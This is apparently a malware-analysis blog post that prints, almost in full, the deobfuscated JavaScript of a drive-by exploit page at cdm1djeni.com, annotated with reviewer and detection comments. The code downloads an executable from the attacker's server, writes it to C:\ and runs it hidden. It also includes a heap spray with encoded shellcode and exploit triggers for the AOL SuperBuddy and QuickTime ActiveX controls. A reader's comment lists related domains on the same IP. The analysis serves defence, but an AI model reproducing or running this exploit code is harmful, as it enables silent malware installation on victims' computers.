cdm1djeni.com/cgi-bin/index.cgi?dx

After several layers of obfuscated JavaScript, the final decoded content is as follows:


// Returns a pseudo-random lowercase alphanumeric string of length j77jHqSx.
// Used by SYvN4dUb below to name the dropped executable under C:\.
// NOTE(review): the alphabet skips the letter 'j' — worth remembering when
// writing a filename pattern for host-side detection.
// NOTE(review): this listing was posted through a blog engine; the
// typographic quotes (“ ” ‘ ’ ″) and the en dash seen later are
// transcription artefacts and are preserved here byte-for-byte.
function C6v5phSX(j77jHqSx)
{
var oc_BNXRW = “abcdefghiklmnopqrstuvwxyz0123456789″;
var NqQGG_DK = ”;
// Math.random() — the drop name cannot be predicted from the sample alone.
for (var VkTuCgOU=0; VkTuCgOU<j77jHqSx; VkTuCgOU++) {
var EJiBajEW = Math.floor(Math.random() * oc_BNXRW.length);
NqQGG_DK += oc_BNXRW.substring(EJiBajEW, EJiBajEW+1);
}

return NqQGG_DK;
}

// Instantiates a COM object named by cl5GFOBF through the ActiveX object
// y0_xpFSO (the classid-created <object> from yTTEd2kT). Six call shapes of
// CreateObject/GetObject are eval'ed in turn until one assigns a non-null
// value; every failure is swallowed. Returns the object, or null if none of
// the variants worked.
// Detection note: eval of a string containing CreateObject/GetObject applied
// to a classid-instantiated <object> is the signature pattern of this family
// of drive-by droppers and is a good content-inspection indicator.
function nhF95ggb(y0_xpFSO, cl5GFOBF)
{
var e5JkKGLv = null;
// Left-hand side of every eval'ed statement: assign into e5JkKGLv.
var FwZ7TC6m = ‘e5JkKGLv=y0_xpFSO.’;
// Call variants, tried in this order.
var kBZ6XrGB = new Array(
‘CreateObject(cl5GFOBF)’,
‘CreateObject(cl5GFOBF, “”)’,
‘CreateObject(cl5GFOBF, “”, “”)’,
‘GetObject(“”, cl5GFOBF)’,
‘GetObject(cl5GFOBF, “”)’,
‘GetObject(cl5GFOBF)’
);

var AKEfb1ki=0;

// Stop at the first variant that yields a truthy object.
while(!e5JkKGLv && AKEfb1ki < kBZ6XrGB.length) {
try {
eval(FwZ7TC6m+kBZ6XrGB[AKEfb1ki]);
} catch(e) { } // deliberate: a failed variant simply falls through to the next

AKEfb1ki++;
}

return e5JkKGLv;
}

// Synchronous GET of AOowwO_Y through the XMLHTTP-style object SJxyPXTM.
// Returns the raw binary responseBody, or 0 if open/send threw.
// The third argument `false` makes the request blocking, so the page stalls
// until the payload has been fetched or the request fails.
function TG1sjYUg(SJxyPXTM, AOowwO_Y)
{

try {
SJxyPXTM.open(“GET”, AOowwO_Y, false);
SJxyPXTM.send(null);

} catch(e) { return 0; } // caller (SYvN4dUb) tests the result against 0

return SJxyPXTM.responseBody;
}

// Writes the binary blob gzYwvXyt to disk at path Q2RHKRuF using an
// ADODB.Stream object (HkhWGaSf). Returns 1 on success, 0 if any step threw.
// Detection note: ADODB.Stream.SaveToFile invoked from a browser process is a
// long-standing indicator of script-driven file drops.
function KieZ8MGb(HkhWGaSf, Q2RHKRuF, gzYwvXyt)
{

try {
HkhWGaSf.Type = 1; // adTypeBinary
HkhWGaSf.Mode = 3; // adModeReadWrite
HkhWGaSf.Open();
HkhWGaSf.Write(gzYwvXyt);
HkhWGaSf.SaveToFile(Q2RHKRuF, 2); // adSaveCreateOverWrite: replaces an existing file
HkhWGaSf.Close();
} catch(e) { return 0; }

return 1;
}

// Download-and-execute stage.
//   NdhWqtKB  – URL to fetch
//   SJxyPXTM  – XMLHTTP object (see TG1sjYUg)
//   HkhWGaSf  – ADODB.Stream object (see KieZ8MGb)
//   Zy7W1vBo  – WScript.Shell or Shell.Application object
//   L_uBnbvS  – 0 → launch via WScript.Shell.Run; otherwise via
//               Shell.Application.ShellExecute
// Returns 1 if the dropped file was launched, else 0. All launch errors are
// swallowed.
function SYvN4dUb(NdhWqtKB, SJxyPXTM, HkhWGaSf, Zy7W1vBo, L_uBnbvS)
{
var Og_Gb_YY = 0;
var AnZ1BTbf = TG1sjYUg(SJxyPXTM, NdhWqtKB);

if (AnZ1BTbf != 0) {
// Drop path: C:\<6 random chars>.exe (see C6v5phSX). A randomly named .exe
// written to the drive root by a browser process is an easy host indicator.
var bW8QW__e = “c:\\”+C6v5phSX(6)+”.exe”;

if (KieZ8MGb(HkhWGaSf, bW8QW__e, AnZ1BTbf) == 1) {
if (L_uBnbvS == 0) {
try {
// Run(path, 0): window style 0 → hidden window.
Zy7W1vBo.Run(bW8QW__e, 0);
Og_Gb_YY = 1;
} catch(e) { }
} else {
try {
// ShellExecute(file, args, dir, verb, show): show 0 → hidden window.
Zy7W1vBo.ShellExecute(bW8QW__e, “”, “”, “open”, 0);
Og_Gb_YY = 1;
} catch(e) { }
}
}
}

return Og_Gb_YY;
}

// First exploitation path: the "classid → CreateObject" dropper.
// Creates an <object> with a fixed CLSID, uses it to obtain an HTTP client,
// an ADODB.Stream and a shell object, then downloads and runs the payload
// from the hard-coded index.cgi URL. Returns 1 if a payload was launched,
// 0 otherwise (every error is swallowed).
// NOTE(review): the CLSID on the setAttribute line is widely documented as
// the MDAC RDS.DataSpace control abused by this technique — confirm against
// a CLSID reference before citing it.
function yTTEd2kT()
{
var xRWj5NGK = 0;
// Number of payload URLs to try: 1, so the loop below runs once and
// appends "0" to the base URL.
var AH7UTZwx = 1;
// Payload URL. The trailing "&#8221;" is a mangled closing quote from the
// blog transcription, not part of the original script.
var AkJeAG2v = “http://cdm1djeni.com/cgi-bin/index.cgi?ede3a3fe0100f060021e964552060000000002a55854370003040900000000020&#8221;;
// [0] HTTP client, [1] ADODB.Stream, [2] shell object
var ctoobgsG = new Array(null, null, null);

try {
// Set to 1 when the shell object ends up being Shell.Application rather
// than WScript.Shell; selects the launch API inside SYvN4dUb.
var wP34Rhxr = 0;
var pdFNqmUw = document.createElement(“object”);
pdFNqmUw.setAttribute(“classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36”);

if (pdFNqmUw) {
// Three XMLHTTP ProgIDs, tried in order.
ctoobgsG[0] = nhF95ggb(pdFNqmUw, “msxml2.XMLHTTP”);
if (!ctoobgsG[0])
ctoobgsG[0] = nhF95ggb(pdFNqmUw, “Microsoft.XMLHTTP”);

if (!ctoobgsG[0])
ctoobgsG[0] = nhF95ggb(pdFNqmUw, “MSXML2.ServerXMLHTTP”);

ctoobgsG[1] = nhF95ggb(pdFNqmUw, “ADODB.Stream”);

ctoobgsG[2] = nhF95ggb(pdFNqmUw, “WScript.Shell”);

// Fallback shell object.
if (!ctoobgsG[2]) {
ctoobgsG[2] = nhF95ggb(pdFNqmUw, “Shell.Application”);
if (ctoobgsG[2]) wP34Rhxr = 1;
}
}

// Proceed only when all three helper objects were obtained.
if (ctoobgsG[0] && ctoobgsG[1] && ctoobgsG[2]) {
for(var maApDNpL=0;maApDNpL<AH7UTZwx;maApDNpL++) {
var jwOMpHKx = SYvN4dUb(AkJeAG2v+maApDNpL.toString(), ctoobgsG[0], ctoobgsG[1], ctoobgsG[2], wP34Rhxr);

// Remember the first successful launch.
if (!xRWj5NGK)
xRWj5NGK = jwOMpHKx;
}
}

} catch(e) {}

return xRWj5NGK;
}

// Sets infection-marker cookies on the current document:
//   id=<YyJyCoZl>   and/or   addt=<CGoWNZCa>
// each with path=/ and an expiry 120000 days out (effectively permanent).
// Both callers in this listing pass a single argument (9 from aYDOf7kN,
// 6 from yWU2EXku), so only the `id` cookie is set and its value records
// which exploit routine ran.
// Detection note: a persistent `id=` cookie with a small integer value for
// this domain is a client-side artefact of the attempt.
function fXNZKHCv(YyJyCoZl, CGoWNZCa)
{
try {

var t7EpCn8v = new Date();
t7EpCn8v.setDate(t7EpCn8v.getDate() + 120000);

if (YyJyCoZl) {
document.cookie =
“id=” + YyJyCoZl +
“; path=/” +
“; expires=” + t7EpCn8v.toGMTString();
}

if (CGoWNZCa) {
document.cookie =
“addt=” + CGoWNZCa +
“; path=/” +
“; expires=” + t7EpCn8v.toGMTString();
}

} catch(e) {
}
}

// Heap-spray state shared by z5UkPTPx and cRptI8eT.
var rjnbcVWi = new Array(); // holds the spray blocks (padding + shellcode)
var TLJFLY3j = 0;           // set to 1 once the spray has been built

// Re-schedules itself every 100 ms. The self-assignment is a no-op;
// presumably it exists to keep the spray array referenced so the engine does
// not collect it while the vulnerable control is being triggered —
// TODO confirm.
function cRptI8eT()
{
rjnbcVWi = rjnbcVWi;
setTimeout(cRptI8eT, 100);
}

// Grows fGQW2WpI by repeated self-concatenation until its UTF-16 byte size
// (length*2) reaches axv_tc2J, then truncates to axv_tc2J/2 characters —
// i.e. returns a string occupying about axv_tc2J bytes. Builds the padding
// half of each spray block in z5UkPTPx.
function BhC9PuAe(fGQW2WpI, axv_tc2J)
{
while (fGQW2WpI.length*2<axv_tc2J)
fGQW2WpI += fGQW2WpI;

fGQW2WpI = fGQW2WpI.substring(0,axv_tc2J/2);
return fGQW2WpI;
}

// Heap spray. Builds ~48 strings, each about 4 MiB (0x400000 bytes) of
// 0x0c0c0c0c padding followed by the shellcode, and stores them in rjnbcVWi
// so that address 0x0c0c0c0c (the value handed to the vulnerable control in
// aYDOf7kN, and sprinkled into the QuickTime parameter in yWU2EXku) is
// likely to land inside the padding. Runs once (guarded by TLJFLY3j);
// always returns 0.
// Detection note: a long %u-encoded unescape() literal, a string-doubling
// loop and the 0x0c0c0c0c constant together are the canonical heap-spray
// signature for content inspection.
function z5UkPTPx()
{
if (!TLJFLY3j) {
// Target address; the same constant is passed to LinkSBIcons in aYDOf7kN.
var Imbda2fQ = 0x0c0c0c0c;
// Shellcode, UTF-16 %u-encoded. NOTE(review): the leading bytes look like a
// call/pop get-PC stub over an encoded body — analyse in a sandbox rather
// than from these bytes.
var vfsx2ajx = unescape(“%u00e8%u0000%u5d00%uc583%ub914%u0190%u0000%u08b0%u4530%u4500%u7549%uebf9%u9800%u9898%u9898%u9898%ue198%u08f4%u0808%u6c57%u38a9%u0808%u7008%u8304%u0448%u7883%ua514%u6083%ue300%u8301%u3c48%u4885%u8374%u3460%uff83%u0c62%ue051%u0887%u0808%uf1ea%u6760%u0866%u6008%u7a7d%u6564%uf75c%u831e%ue0e0%u0871%u0808%udf83%u884f%u0837%uf27d%u5f4f%u884f%u0837%uf27d%ue783%u3b57%u89c1%u0ce4%u0809%u8308%u59d4%u5b5a%u0c60%u0809%uf708%u045e%u5152%u5a59%u0a83%u4b5b%u3388%u7d08%u89f2%uf473%u6d26%u6d70%u0b7d%ue38b%u8100%ucf0b%u0c4b%u6d26%u6d70%u4bce%u0800%u8253%u0cc9%u8038%u084d%uc83b%u5858%u5f5b%uf758%u185e%uf08b%u7d08%u620e%u5b09%u5ef7%u520c%u8b51%u0cca%u8849%u0832%ubc7d%u5ef7%u5900%u835e%u347d%u7c83%u7026%ufd0b%u835e%u287e%ufd0b%uc13b%u4941%u0ba5%u3bcd%u07d3%u18b6%ude32%u007c%uc3c9%u0b05%u48d2%uf9e3%u1733%uef7d%u8356%u2c56%ud50b%u836e%u4304%u5683%u0b14%u83d5%u830c%ucd0b%u56a3%ucb51%uf7e0%uf7f6%u86f7%u0646%u90e4%u82f6%u7606%uead0%u3b7b%u82c2%u3e53%u2712%u4b78%u5171%u087d%u7c60%u787c%u2732%u6b27%u656c%u6c39%u6d62%u6166%u6b26%u6567%u6b27%u616f%u6a25%u6661%u6127%u6c66%u706d%u6b26%u616f%u6d37%u6d6c%u693b%u6e3b%u386d%u3839%u6e38%u3e38%u3838%u393a%u316d%u3c3e%u3d3d%u383a%u383e%u3838%u3838%u3838%u3838%u693a%u3d3d%u3d30%u3b3c%u383f%u3838%u383b%u383c%u3831%u3838%u3838%u3838%u3838%u3830%u0008”);
// Block size: 4 MiB.
var A1GHCJ0I = 0x400000;
// Shellcode size in bytes (2 per UTF-16 code unit).
var Yv0fjrfS = vfsx2ajx.length * 2;
// Padding size = block size minus shellcode minus 0x38 (presumably string /
// heap header overhead). The en dash here is a transcription artefact for '-'.
var axv_tc2J = A1GHCJ0I – (Yv0fjrfS+0x38);
// Four bytes of 0x0c: serves both as slide and as the target value.
var fGQW2WpI = unescape(“%u0c0c%u0c0c”);

fGQW2WpI = BhC9PuAe(fGQW2WpI,axv_tc2J);
// Blocks needed to reach the target address starting at 0x400000
// (about 47.2, so the loop below runs 48 times). En dash as above.
var gqW1gRWx = (Imbda2fQ – 0x400000)/A1GHCJ0I;

for (var rDjzS8iO=0;rDjzS8iO<gqW1gRWx;rDjzS8iO++) {
rjnbcVWi[rDjzS8iO] = fGQW2WpI + vfsx2ajx;
}

TLJFLY3j = 1;
// Start the keep-alive timer for the spray array.
cRptI8eT();
}

return 0;
}

// Second exploitation path: the AOL "Sb.SuperBuddy" ActiveX control. If the
// control instantiates, builds the heap spray, drops the id=9 marker cookie,
// then calls LinkSBIcons with the spray address 0x0c0c0c0c. Always returns 0,
// even after the call, so the caller's `||` chain continues to yWU2EXku.
// Mitigation note: the trigger is the method call itself, nothing is
// downloaded first — setting the kill bit for this control (or removing it)
// neutralises this path.
function aYDOf7kN() {

try {
var lKcQNr_i = new ActiveXObject(‘Sb.SuperBuddy’);

if (lKcQNr_i) {
z5UkPTPx();
fXNZKHCv(9);
lKcQNr_i.LinkSBIcons(0x0c0c0c0c);
}
} catch(e) {
}

return 0;
}

// Third exploitation path: the Apple QuickTime plugin (ProgID
// "QuickTime.QuickTime.4"). Builds the heap spray, then injects an <object>
// whose `qtnext1` parameter is an over-long rtsp:// URL (803 'A' characters
// followed by 12 bytes of 0x0c), drops the id=6 marker cookie and appends the
// element to the page so the plugin loads it. Always returns 0.
// Mitigation note: as with aYDOf7kN, blocking or removing the plugin is the
// host-side fix; the payload URL in the `src` parameter is secondary.
function yWU2EXku()
{
try {
var EF8iSrGY = new ActiveXObject(“QuickTime.QuickTime.4”);

if (EF8iSrGY) {
z5UkPTPx();
// 200 * "AAAA" + "AAA" = 803 filler characters.
var HRtvZlIp = “”;
for(var cwfnrm_q=0;cwfnrm_q<200;cwfnrm_q++) {
HRtvZlIp += “AAAA”;
}

HRtvZlIp += “AAA”;

// Then 3 * 4 bytes of 0x0c — the spray address pattern.
for(var cwfnrm_q=0;cwfnrm_q<3;cwfnrm_q++) {
HRtvZlIp += “\x0c\x0c\x0c\x0c”;
}

// QuickTime <object> markup; the filler above lands in the qtnext1 rtsp URL.
// The "&#8217;" inside the src line is a mangled quote from the transcription.
var Xx88lxkG =
‘<object classid=”clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B” width=”200″ height=”200″>’ +
‘<param name=”src” value=”http://cdm1djeni.com/cgi-bin/index.cgi?ede3a3fe0100f060011e964552060000000002a5585437000304090000000006″>&#8217; +
‘<param name=”type” value=”image/x-quicktime”>’ +
‘<param name=”autoplay” value=”true”>’ +
‘<param name=”qtnext1″ value=”<rtsp://AXDOF:’ + HRtvZlIp +
‘>T<myself>”>’ +
‘<param name=”target” value=”myself”>’ +
‘</object>’;

// NOTE(review): i44TB6HK is never declared, so this creates an implicit
// global; the commented-out tail of the listing reads document.i44TB6HK,
// so the two were probably once connected.
i44TB6HK = 0;
var Nj2qgprh = document.createElement(“div”);
// innerHTML insertion of the <object> is what triggers the plugin load.
Nj2qgprh.innerHTML = Xx88lxkG;
fXNZKHCv(6);
document.body.appendChild(Nj2qgprh);

}
} catch(e) {
}

return 0;
}
// Entry point: run the three exploit routines in order. Only yTTEd2kT can
// return 1 and short-circuit the chain; aYDOf7kN and yWU2EXku always return
// 0, so in practice all three are attempted. Both branches assign the same
// value, so the outcome is unused here; document.QvPNJ2gK is read only by
// the commented-out redirect that follows.
if (yTTEd2kT() || aYDOf7kN() || yWU2EXku()
) {
document.QvPNJ2gK = ‘about:blank’;
} else {
document.QvPNJ2gK = ‘about:blank’;
}

/*setTimeout(function() {
if (document.i44TB6HK && document.MNYpDkrw && document.DApIuZCX) {
setTimeout(“window.location = ‘” + document.QvPNJ2gK + “‘;”, 1000);
} else {
setTimeout(arguments.callee, 1000);
}
}, 1000);*/

The VT analysis of http://cdm1djeni.com/cgi-bin/index.cgi?ede3a3fe0100f060021e964552060000000002a55854370003040900000000020 is here


One Response to “cdm1djeni.com/cgi-bin/index.cgi?dx”

  1. Based on a robtex lookup, the following domains share the same IP address:
    cdm1djeni.com
    daadhevif.com
    den2djeni.com
    dtd1eni.com
    etcyght.com
    eue2eni.com
    gvryehght.com
    hiepdjeni.com
    jjgyght.com
